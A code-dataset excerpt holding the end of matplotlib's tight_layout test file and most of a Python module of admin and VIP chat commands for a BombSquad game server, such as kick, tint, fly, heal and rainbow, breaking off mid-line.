example_plot(ax3)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout4'], freetype_version=('2.5.5', '2.6.1'),\n tol=0.015)\ndef test_tight_layout4():\n \"\"\"Test tight_layout for subplot2grid.\"\"\"\n ax1 = plt.subplot2grid((3, 3), (0, 0))\n ax2 = plt.subplot2grid((3, 3), (0, 1), colspan=2)\n ax3 = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=2)\n ax4 = plt.subplot2grid((3, 3), (1, 2), rowspan=2)\n example_plot(ax1)\n example_plot(ax2)\n example_plot(ax3)\n example_plot(ax4)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout5'])\ndef test_tight_layout5():\n \"\"\"Test tight_layout for image.\"\"\"\n ax = plt.subplot()\n arr = np.arange(100).reshape((10, 10))\n ax.imshow(arr, interpolation=\"none\")\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout6'])\ndef test_tight_layout6():\n \"\"\"Test tight_layout for gridspec.\"\"\"\n\n # This raises warnings since tight layout cannot\n # do this fully automatically. But the test is\n # correct since the layout is manually edited\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", UserWarning)\n fig = plt.figure()\n\n gs1 = mpl.gridspec.GridSpec(2, 1)\n ax1 = fig.add_subplot(gs1[0])\n ax2 = fig.add_subplot(gs1[1])\n\n example_plot(ax1)\n example_plot(ax2)\n\n gs1.tight_layout(fig, rect=[0, 0, 0.5, 1])\n\n gs2 = mpl.gridspec.GridSpec(3, 1)\n\n for ss in gs2:\n ax = fig.add_subplot(ss)\n example_plot(ax)\n ax.set_title(\"\")\n ax.set_xlabel(\"\")\n\n ax.set_xlabel(\"x-label\", fontsize=12)\n\n gs2.tight_layout(fig, rect=[0.5, 0, 1, 1], h_pad=0.45)\n\n top = min(gs1.top, gs2.top)\n bottom = max(gs1.bottom, gs2.bottom)\n\n gs1.tight_layout(fig, rect=[None, 0 + (bottom-gs1.bottom),\n 0.5, 1 - (gs1.top-top)])\n gs2.tight_layout(fig, rect=[0.5, 0 + (bottom-gs2.bottom),\n None, 1 - (gs2.top-top)],\n h_pad=0.45)\n\n\n@image_comparison(['tight_layout7'], tol=1.9)\ndef test_tight_layout7():\n # tight layout with left and right titles\n fontsize = 24\n fig, ax = plt.subplots()\n ax.plot([1, 2])\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Left Title', loc='left', fontsize=fontsize)\n ax.set_title('Right Title', loc='right', fontsize=fontsize)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout8'])\ndef test_tight_layout8():\n \"\"\"Test automatic use of tight_layout.\"\"\"\n fig = plt.figure()\n fig.set_layout_engine(layout='tight', pad=0.1)\n ax = fig.add_subplot()\n example_plot(ax, fontsize=24)\n fig.draw_without_rendering()\n\n\n@image_comparison(['tight_layout9'])\ndef test_tight_layout9():\n # Test tight_layout for non-visible subplots\n # GH 8244\n f, axarr = plt.subplots(2, 2)\n axarr[1][1].set_visible(False)\n plt.tight_layout()\n\n\ndef test_outward_ticks():\n \"\"\"Test automatic use of tight_layout.\"\"\"\n fig = plt.figure()\n ax = fig.add_subplot(221)\n ax.xaxis.set_tick_params(tickdir='out', length=16, width=3)\n ax.yaxis.set_tick_params(tickdir='out', length=16, width=3)\n ax.xaxis.set_tick_params(\n tickdir='out', length=32, width=3, tick1On=True, which='minor')\n ax.yaxis.set_tick_params(\n tickdir='out', length=32, width=3, tick1On=True, which='minor')\n ax.xaxis.set_ticks([0], minor=True)\n ax.yaxis.set_ticks([0], minor=True)\n ax = fig.add_subplot(222)\n ax.xaxis.set_tick_params(tickdir='in', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='in', length=32, width=3)\n ax = fig.add_subplot(223)\n ax.xaxis.set_tick_params(tickdir='inout', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='inout', length=32, width=3)\n ax = fig.add_subplot(224)\n ax.xaxis.set_tick_params(tickdir='out', length=32, width=3)\n ax.yaxis.set_tick_params(tickdir='out', length=32, width=3)\n plt.tight_layout()\n # These values were obtained after visual checking that they correspond\n # to a tight layouting that did take the ticks into account.\n ans = [[[0.091, 0.607], [0.433, 0.933]],\n [[0.579, 0.607], [0.922, 0.933]],\n [[0.091, 0.140], [0.433, 0.466]],\n [[0.579, 0.140], [0.922, 0.466]]]\n for nn, ax in enumerate(fig.axes):\n assert_array_equal(np.round(ax.get_position().get_points(), 3),\n ans[nn])\n\n\ndef add_offsetboxes(ax, size=10, margin=.1, color='black'):\n \"\"\"\n Surround ax with OffsetBoxes\n \"\"\"\n m, mp = margin, 1+margin\n anchor_points = [(-m, -m), (-m, .5), (-m, mp),\n (mp, .5), (.5, mp), (mp, mp),\n (.5, -m), (mp, -m), (.5, -m)]\n for point in anchor_points:\n da = DrawingArea(size, size)\n background = Rectangle((0, 0), width=size,\n height=size,\n facecolor=color,\n edgecolor='None',\n linewidth=0,\n antialiased=False)\n da.add_artist(background)\n\n anchored_box = AnchoredOffsetbox(\n loc='center',\n child=da,\n pad=0.,\n frameon=False,\n bbox_to_anchor=point,\n bbox_transform=ax.transAxes,\n borderpad=0.)\n ax.add_artist(anchored_box)\n return anchored_box\n\n\n@image_comparison(['tight_layout_offsetboxes1', 'tight_layout_offsetboxes2'])\ndef test_tight_layout_offsetboxes():\n # 1.\n # - Create 4 subplots\n # - Plot a diagonal line on them\n # - Surround each plot with 7 boxes\n # - Use tight_layout\n # - See that the squares are included in the tight_layout\n # and that the squares in the middle do not overlap\n #\n # 2.\n # - Make the squares around the right side axes invisible\n # - See that the invisible squares do not affect the\n # tight_layout\n rows = cols = 2\n colors = ['red', 'blue', 'green', 'yellow']\n x = y = [0, 1]\n\n def _subplots():\n _, axs = plt.subplots(rows, cols)\n axs = axs.flat\n for ax, color in zip(axs, colors):\n ax.plot(x, y, color=color)\n add_offsetboxes(ax, 20, color=color)\n return axs\n\n # 1.\n axs = _subplots()\n plt.tight_layout()\n\n # 2.\n axs = _subplots()\n for ax in (axs[cols-1::rows]):\n for child in ax.get_children():\n if isinstance(child, AnchoredOffsetbox):\n child.set_visible(False)\n\n plt.tight_layout()\n\n\ndef test_empty_layout():\n \"\"\"Test that tight layout doesn't cause an error when there are no axes.\"\"\"\n fig = plt.gcf()\n fig.tight_layout()\n\n\n@pytest.mark.parametrize(\"label\", [\"xlabel\", \"ylabel\"])\ndef test_verybig_decorators(label):\n \"\"\"Test that no warning emitted when xlabel/ylabel too big.\"\"\"\n fig, ax = plt.subplots(figsize=(3, 2))\n ax.set(**{label: 'a' * 100})\n\n\ndef test_big_decorators_horizontal():\n \"\"\"Test that doesn't warn when xlabel too big.\"\"\"\n fig, axs = plt.subplots(1, 2, figsize=(3, 2))\n axs[0].set_xlabel('a' * 30)\n axs[1].set_xlabel('b' * 30)\n\n\ndef test_big_decorators_vertical():\n \"\"\"Test that doesn't warn when ylabel too big.\"\"\"\n fig, axs = plt.subplots(2, 1, figsize=(3, 2))\n axs[0].set_ylabel('a' * 20)\n axs[1].set_ylabel('b' * 20)\n\n\ndef test_badsubplotgrid():\n # test that we get warning for mismatched subplot grids, not than an error\n plt.subplot2grid((4, 5), (0, 0))\n # this is the bad entry:\n plt.subplot2grid((5, 5), (0, 3), colspan=3, rowspan=5)\n with pytest.warns(UserWarning):\n plt.tight_layout()\n\n\ndef test_collapsed():\n # test that if the amount of space required to make all the axes\n # decorations fit would mean that the actual Axes would end up with size\n # zero (i.e. margins add up to more than the available width) that a call\n # to tight_layout will not get applied:\n fig, ax = plt.subplots(tight_layout=True)\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n\n ax.annotate('BIG LONG STRING', xy=(1.25, 2), xytext=(10.5, 1.75),\n annotation_clip=False)\n p1 = ax.get_position()\n with pytest.warns(UserWarning):\n plt.tight_layout()\n p2 = ax.get_position()\n assert p1.width == p2.width\n # test that passing a rect doesn't crash...\n with pytest.warns(UserWarning):\n plt.tight_layout(rect=[0, 0, 0.8, 0.8])\n\n\ndef test_suptitle():\n fig, ax = plt.subplots(tight_layout=True)\n st = fig.suptitle(\"foo\")\n t = ax.set_title(\"bar\")\n fig.canvas.draw()\n assert st.get_window_extent().y0 > t.get_window_extent().y1\n\n\n@pytest.mark.backend(\"pdf\")\ndef test_non_agg_renderer(monkeypatch, recwarn):\n unpatched_init = mpl.backend_bases.RendererBase.__init__\n\n def __init__(self, *args, **kwargs):\n # Check that we don't instantiate any other renderer than a pdf\n # renderer to perform pdf tight layout.\n assert isinstance(self, mpl.backends.backend_pdf.RendererPdf)\n unpatched_init(self, *args, **kwargs)\n\n monkeypatch.setattr(mpl.backend_bases.RendererBase, \"__init__\", __init__)\n fig, ax = plt.subplots()\n fig.tight_layout()\n\n\ndef test_manual_colorbar():\n # This should warn, but not raise\n fig, axes = plt.subplots(1, 2)\n pts = axes[1].scatter([0, 1], [0, 1], c=[1, 5])\n ax_rect = axes[1].get_position()\n cax = fig.add_axes(\n [ax_rect.x1 + 0.005, ax_rect.y0, 0.015, ax_rect.height]\n )\n fig.colorbar(pts, cax=cax)\n with pytest.warns(UserWarning, match=\"This figure includes Axes\"):\n fig.tight_layout()\n\n\ndef test_clipped_to_axes():\n # Ensure that _fully_clipped_to_axes() returns True under default\n # conditions for all projection types. Axes.get_tightbbox()\n # uses this to skip artists in layout calculations.\n arr = np.arange(100).reshape((10, 10))\n fig = plt.figure(figsize=(6, 2))\n ax1 = fig.add_subplot(131, projection='rectilinear')\n ax2 = fig.add_subplot(132, projection='mollweide')\n ax3 = fig.add_subplot(133, projection='polar')\n for ax in (ax1, ax2, ax3):\n # Default conditions (clipped by ax.bbox or ax.patch)\n ax.grid(False)\n h, = ax.plot(arr[:, 0])\n m = ax.pcolor(arr)\n assert h._fully_clipped_to_axes()\n assert m._fully_clipped_to_axes()\n # Non-default conditions (not clipped by ax.patch)\n rect = Rectangle((0, 0), 0.5, 0.5, transform=ax.transAxes)\n h.set_clip_path(rect)\n m.set_clip_path(rect.get_path(), rect.get_transform())\n assert not h._fully_clipped_to_axes()\n assert not m._fully_clipped_to_axes()\n\n\ndef test_tight_pads():\n fig, ax = plt.subplots()\n with pytest.warns(PendingDeprecationWarning,\n match='will be deprecated'):\n fig.set_tight_layout({'pad': 0.15})\n fig.draw_without_rendering()\n\n\ndef test_tight_kwargs():\n fig, ax = plt.subplots(tight_layout={'pad': 0.15})\n fig.draw_without_rendering()\n\n\ndef test_tight_toggle():\n fig, ax = plt.subplots()\n with pytest.warns(PendingDeprecationWarning):\n fig.set_tight_layout(True)\n assert fig.get_tight_layout()\n fig.set_tight_layout(False)\n assert not fig.get_tight_layout()\n fig.set_tight_layout(True)\n assert fig.get_tight_layout()\n","repo_name":"matplotlib/matplotlib","sub_path":"lib/matplotlib/tests/test_tightlayout.py","file_name":"test_tightlayout.py","file_ext":"py","file_size_in_byte":12704,"program_lang":"python","lang":"en","doc_type":"code","stars":18437,"dataset":"github-code","pt":"5"} +{"seq_id":"44454516188","text":"import ba\nfrom _ba import chatmessage\nimport _ba\n\nfrom bd.chat.commands_engine import servercommand, _handlers\nfrom bd.playerdata import PlayerData, Status, get_player_by\nfrom bd.locale import get_locale\n\n\n@servercommand('help'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef help_callback(playerdata: PlayerData, args):\n for handler in _handlers:\n chatmessage(\"{} - {}\".format(\n handler.commands[0],\n get_locale('command_help').get(\n handler.commands[0],\n get_locale('command_help_not_found'))))\n\n\n@servercommand('list l'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef list_callback(playerdata: PlayerData, args):\n client_ids = [(\n i['players'][0]['name_full'] if i['players'] else\n i['displayString'], str(i['client_id']))\n for i in _ba.get_game_roster()]\n\n chatmessage(get_locale('player_ids_text'))\n activity = _ba.get_foreground_host_activity()\n for i in range(len(activity.players)):\n p = activity.players[i]\n chatmessage('{} | {} | {}'.format(i, p.getname().ljust(15), p.sessionplayer.inputdevice.client_id))\n chatmessage(get_locale('dividing_strip_text'))\n\n\n@servercommand('kick'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef kick_callback(playerdata: PlayerData, args):\n if len(args) < 2 or (not args[1].isdigit() and args[1] != '-1'):\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == '-1':\n chatmessage(get_locale('kick_host_error'))\n else:\n ban_time = 300\n clients_ids = [player['client_id'] for player in\n _ba.get_game_roster()]\n if len(args) > 1 and playerdata.status == Status.ADMIN:\n ban_time = int(args[1])\n elif len(args) > 1 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('time_arg_access_error'))\n\n if int(args[1]) in clients_ids:\n target = get_player_by('client_id', int(args[1]))\n if target.status == Status.ADMIN:\n chatmessage(get_locale('kick_admin_error'))\n else:\n _ba.disconnect_client(int(args[1]),\n ban_time=ban_time)\n else:\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('remove'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef remove_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for player in activity.players:\n player.sessionplayer.remove_from_game()\n else:\n activity.players[int(args[1])].sessionplayer.remove_from_game()\n\n\n@servercommand('end'.split(), {Status.ADMIN: 0, Status.VIP: 120})\ndef end_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n assert isinstance(activity, ba.GameActivity)\n activity.end_game()\n\n\n@servercommand('ooh'.split(), {Status.ADMIN: 0, Status.VIP: 60})\ndef ooh_callback(playerdata: PlayerData, args):\n ba.playsound(ba.getsound('ooh'), volume=2)\n\n\n@servercommand('playsound ps'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef play_sound_callback(playerdata: PlayerData, args):\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n ba.playsound(ba.getsound(str(args[0])), volume=2)\n\n\n@servercommand('nv'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef nv_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n tint = {0: activity.globalsnode.tint,\n 1: (0.5, 0.7, 1.0)}\n ba.animate_array(activity.globalsnode, 'tint', 3, tint)\n\n\n@servercommand('dv'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef dv_callback(playerdata: PlayerData, args):\n tint = {0: ba.getactivity().globalsnode.tint,\n 1: (1.0, 1.0, 1.0)}\n\n ba.animate_array(ba.getactivity().globalsnode, 'tint', 3, tint)\n\n\n@servercommand('box tnt'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef box_callback(playerdata: PlayerData, args):\n from bastd.actor.playerspaz import PlayerSpaz\n\n def do_box(player):\n if player.actor and isinstance(player.actor, PlayerSpaz) and player.actor.node:\n player.actor.node.torso_model = ba.getmodel('tnt')\n player.actor.node.color_mask_texture = ba.gettexture('tnt')\n player.actor.node.color_texture = ba.gettexture('tnt')\n player.actor.node.highlight = (1, 1, 1)\n player.actor.node.color = (1, 1, 1)\n player.actor.node.head_model = None\n player.actor.node.style = 'cyborg'\n\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for iplayer in activity.players:\n do_box(iplayer)\n else:\n try:\n iplayer = activity.players[int(args[1])]\n do_box(iplayer)\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('hug'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef hug_callback(playerdata: PlayerData, args):\n def do_hug(p1: ba.Player, p2: ba.Player):\n from bastd.actor.playerspaz import PlayerSpaz\n if (p1.actor.is_alive() and isinstance(p1.actor, PlayerSpaz) and\n p2.actor.is_alive() and isinstance(p2.actor, PlayerSpaz)):\n p1.actor.node.hold_node = p2.actor.node\n p2.actor.node.hold_node = p1.actor.node\n\n activity = ba.getactivity()\n if len(args) == 1:\n alives = []\n for i in range(len(activity.players)):\n if activity.players[i]:\n alives.append(i)\n count = len(alives) // 2\n for i in range(count):\n do_hug(activity.players[alives[i]], activity.players[alives[count + i]])\n elif len(args) == 3:\n try:\n do_hug(activity.players[int(args[1])], activity.players[int(args[2])])\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n@servercommand('tint'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef tint_callback(playerdata: PlayerData, args):\n if len(args) < 2 or (len(args) < 4 and args[1] != 'r'):\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'r':\n m = 1.30 if len(args) < 3 else float(args[2])\n s = 1000 if len(args) < 4 else float(args[3])\n if m > 3 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('too_big_arg_error'))\n return\n tint = {\n s * 0: (m, 0, 0),\n s * 1: (0, m, 0),\n s * 2: (0, 0, m),\n s * 3: (m, 0, 0),\n }\n\n ba.animate_array(ba.getactivity().globalsnode,\n 'tint', 3, tint, True, suppress_format_warning=True,\n timeformat=ba.TimeFormat.MILLISECONDS)\n else:\n color = (float(args[1]),\n float(args[2]),\n float(args[3]))\n if max(map(abs, color)) > 3 and playerdata.status != Status.ADMIN:\n chatmessage(get_locale('too_big_arg_error'))\n return\n ba.getactivity().globalsnode.tint = color\n\n\n@servercommand('sm'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef sm_callback(playerdata: PlayerData, args):\n if not ba.getactivity().globalsnode.slow_motion:\n ba.getactivity().globalsnode.slow_motion = True\n else:\n ba.getactivity().globalsnode.slow_motion = False\n\n\n@servercommand('gp'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef gp_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n chatmessage(get_locale('player_profiles_text'))\n try:\n inputdevice = activity.players[int(args[1])].sessionplayer.inputdevice\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n return\n profiles = inputdevice.get_player_profiles()\n\n for profile in profiles:\n if profile == '__account__':\n profile = inputdevice.get_account_name(False)\n chatmessage(profile)\n\n chatmessage(get_locale('dividing_strip_text'))\n\n\n@servercommand('fly'.split(), {Status.VIP: 60, Status.ADMIN: 0})\ndef fly_callback(playerdata: PlayerData, args):\n from bastd.actor.playerspaz import PlayerSpaz\n activity = ba.getactivity()\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for player in activity.players:\n if player.actor and isinstance(player.actor, PlayerSpaz):\n player.actor.node.fly = True\n else:\n try:\n player = activity.players[int(args[1])]\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n return\n if player.actor and hasattr(player.actor, 'node'):\n if not player.actor.node.fly:\n player.actor.node.fly = True\n else:\n player.actor.node.fly = False\n\n\n@servercommand('ac'.split(), {Status.ADMIN: 0, Status.VIP: 0})\ndef ac_callback(playerdata: PlayerData, args):\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'r':\n m = 1.30 if len(args) < 3 else float(args[2])\n s = 1000 if len(args) < 4 else float(args[3])\n ambient_color = {\n s * 0: (m, 0, 0),\n s * 1: (0, m, 0),\n s * 2: (0, 0, m),\n s * 3: (m, 0, 0)\n }\n\n ba.animate_array(ba.getactivity().globalsnode,\n 'ambient_color', 3, ambient_color, True, suppress_format_warning=True,\n timeformat=ba.TimeFormat.MILLISECONDS)\n else:\n ba.getactivity().globalsnode.ambientColor = (float(args[1]),\n float(args[2]),\n float(args[3]))\n\n\n@servercommand('io iceoff'.split(), statuses={Status.ADMIN: 0, Status.VIP: 0})\ndef ice_off_callback(playerdata: PlayerData, args):\n from bastd.gameutils import SharedObjects\n shared = SharedObjects.get()\n activity = ba.getactivity()\n assert isinstance(activity, ba.GameActivity)\n activity.map.is_hockey = False\n activity.map.node.materials = [shared.footing_material]\n activity.map.floor.materials = [shared.footing_material]\n\n\n@servercommand('heal'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef heal_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 2:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all':\n for i in activity.players:\n if i.actor and hasattr(i.actor, 'node'):\n assert isinstance(i.actor.node, ba.Node)\n i.actor.node.handlemessage(\n ba.PowerupMessage(poweruptype='health'))\n else:\n player = activity.players[int(args[0])]\n if player.actor and hasattr(player.actor, 'node'):\n assert isinstance(player.actor.node, ba.Node)\n player.actor.node.handlemessage(\n ba.PowerupMessage(poweruptype='health'))\n\n\n@servercommand('ref reflections'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef reflections_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n assert isinstance(activity, ba.GameActivity)\n try:\n rs = [int(args[2])]\n ref_type = 'soft' if int(args[1]) == 0 else 'powerup'\n except (ValueError, IndexError):\n chatmessage(get_locale('chat_command_not_args_error'))\n return\n\n activity.map.node.reflection = ref_type\n activity.map.node.reflection_scale = rs\n\n try:\n activity.map.bg.reflection = ref_type\n activity.map.bg.reflection_scale = rs\n except AttributeError:\n pass\n\n try:\n activity.map.floor.reflection = ref_type\n activity.map.floor.reflection_scale = rs\n except AttributeError:\n pass\n\n try:\n activity.map.center.reflection = ref_type\n activity.map.center.reflection_scale = rs\n except AttributeError:\n pass\n\n\n@servercommand('shatter'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef shatter_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if len(args) < 3 or not args[2].isdigit():\n chatmessage(get_locale('chat_command_not_args_error'))\n else:\n level = int(args[2])\n if args[1] == 'all' and playerdata.status == Status.ADMIN:\n for i in activity.players:\n i.actor.node.shattered = level\n else:\n try:\n activity.players[int(args[0])].actor.node.shattered = level\n except (ValueError, IndexError):\n chatmessage(get_locale('not_player_error'))\n\n# ВНИМАНИЕ! ЗАКРОЙТЕ ГЛАЗА! тут говнокод\n# @servercommand(commands=('/cm',),\n# statuses=(Status.VIP, Status.ADMIN))\n# def cm_callback(playerdata: PlayerData, args):\n# if not args:\n# time = 10000\n# else:\n# time = int(args[0])\n#\n# op = 0.08\n# std = ba.getactivity().globalsnode.vignetteOuter\n# vignetteOuter = {\n# 0: ba.getactivity().globalsnode.vignetteOuter,\n# 17000: (0, 1, 0)\n# }\n#\n# ba.animateArray(ba.getactivity().globalsnode,\n# 'vignetteOuter', 3, vignetteOuter)\n#\n# try:\n# activity.map.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node1.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node2.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node3.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.steps.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.floor.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node4.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.center.opacity = op\n# except Exception:\n# pass\n#\n# def off():\n# op = 1\n# try:\n# activity.map.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.bg.node.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node1.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node2.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node3.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.node4.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.steps.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.floor.opacity = op\n# except Exception:\n# pass\n#\n# try:\n# activity.map.center.opacity = op\n# except Exception:\n# pass\n#\n# vignetteOuter = {\n# 0: ba.getactivity().globalsnode.vignetteOuter,\n# 100: std\n# }\n#\n# ba.animateArray(ba.getactivity().globalsnode,\n# 'vignetteOuter', 3, vignetteOuter)\n#\n# ba.timer(time, off)\n\n\n@servercommand('sleep'.split(), {Status.VIP: 10, Status.ADMIN: 0})\ndef sleep_callback(playerdata: PlayerData, args):\n activity = ba.getactivity()\n if not args:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all' and playerdata.status == Status.ADMIN:\n for i in activity.players:\n try:\n i.actor.node.handlemessage('knockout', 5000)\n except AttributeError:\n pass\n else:\n try:\n activity.players[int(args[1])].actor.node.handlemessage(\n 'knockout', 5000)\n except (ValueError, IndexError):\n chatmessage(get_locale('not_player_error'))\n except AttributeError:\n pass\n\n\n# @servercommand(commands=('/skin',),\n# statuses=(Status.VIP, Status.ADMIN))\n# def skin_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error'))\n# elif args[0] == 'names':\n# chatmessage(get_locale('skin_names_text'))\n# for msg in get_locale('skin_names'):\n# chatmessage(msg)\n# chatmessage(get_locale('dividing_strip_text'))\n# elif str(args[1]) in SKIN_NAMES:\n# account_id = activity.players[int(args[0])].get_account_id()\n# bd.server.custom_skins[account_id] = str(args[1])\n# elif str(args[1]) == 'reset':\n# account_id = activity.players[int(args[0])].get_account_id()\n# bd.server.custom_skins.pop(account_id, None)\n\n\n@servercommand('rainbow'.split(), {Status.VIP: 0, Status.ADMIN: 0})\ndef rainbow_callback(playerdata: PlayerData, args):\n color = {\n 0: (0, 0, 3), 0.5: (0, 3, 0),\n 1: (3, 0, 0), 1.5: (0, 0, 3)\n }\n\n highlight = {\n 0: (3, 0, 0), 0.5: (0, 0, 0),\n 1: (0, 0, 3), 1.5: (3, 0, 0)\n }\n\n def do_rainbow(player):\n if player and player.actor and player.actor.node:\n ba.animate_array(player.actor.node,\n 'color', 3, color, True)\n ba.animate_array(player.actor.node,\n 'highlight', 3, highlight, True)\n player.actor.node.handlemessage(\n 'celebrate', 6000)\n\n activity = ba.getactivity()\n\n if len(args) < 1:\n chatmessage(get_locale('chat_command_not_args_error'))\n elif args[1] == 'all':\n for i in activity.players:\n do_rainbow(i)\n else:\n try:\n do_rainbow(activity.players[int(args[1])])\n except (IndexError, ValueError):\n chatmessage(get_locale('not_player_error'))\n\n\n# commands handlers for admins\n@servercommand('restart'.split(), {Status.ADMIN: 0})\ndef restart_callback(playerdata: PlayerData, args):\n _ba.quit()\n\n\n# @servercommand(commands=('/freeze',),\n# statuses=(Status.ADMIN,))\n# def freeze_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.FreezeMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.FreezeMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.FreezeMessage())\n#\n#\n# @servercommand(commands=('/thaw',),\n# statuses=(Status.ADMIN,))\n# def thaw_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.ThawMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.ThawMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.ThawMessage())\n#\n#\n# @servercommand(commands=('/kill',),\n# statuses=(Status.ADMIN,))\n# def kill_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.node.handlemessage(ba.DieMessage())\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.node.handlemessage(ba.DieMessage())\n# else:\n# activity.players[int(args[0])].actor.node.handlemessage(\n# ba.DieMessage())\n#\n#\n# @servercommand(commands=('/curse',),\n# statuses=(Status.ADMIN,))\n# def curse_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# i.actor.curse()\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = i.sessionplayer.inputdevice._getAccountName(\n# False).encode('utf-8')\n#\n# if account_name == args[1]:\n# i.actor.curse()\n# else:\n# activity.players[int(args[0])].actor.curse()\n#\n#\n# @servercommand(commands=('/gm',),\n# statuses=(Status.ADMIN,))\n# def gm_callback(playerdata: PlayerData, args):\n# if not args:\n# chatmessage(get_locale('chat_command_not_args_error')\n# elif args[0] == 'all':\n# for i in activity.players:\n# try:\n# if not i.actor.node.hockey:\n# i.actor.node.hockey = True\n# else:\n# i.actor.node.hockey = False\n#\n# if not i.actor.node.invincible:\n# i.actor.node.invincible = True\n# else:\n# i.actor.node.invincible = False\n#\n# if i.actor._punchPowerScale == 1.2:\n# i.actor._punchPowerScale = 5\n# else:\n# i.actor._punchPowerScale = 1.2\n# except Exception:\n# pass\n# elif args[0] == 'device':\n# for i in activity.players:\n# account_name = 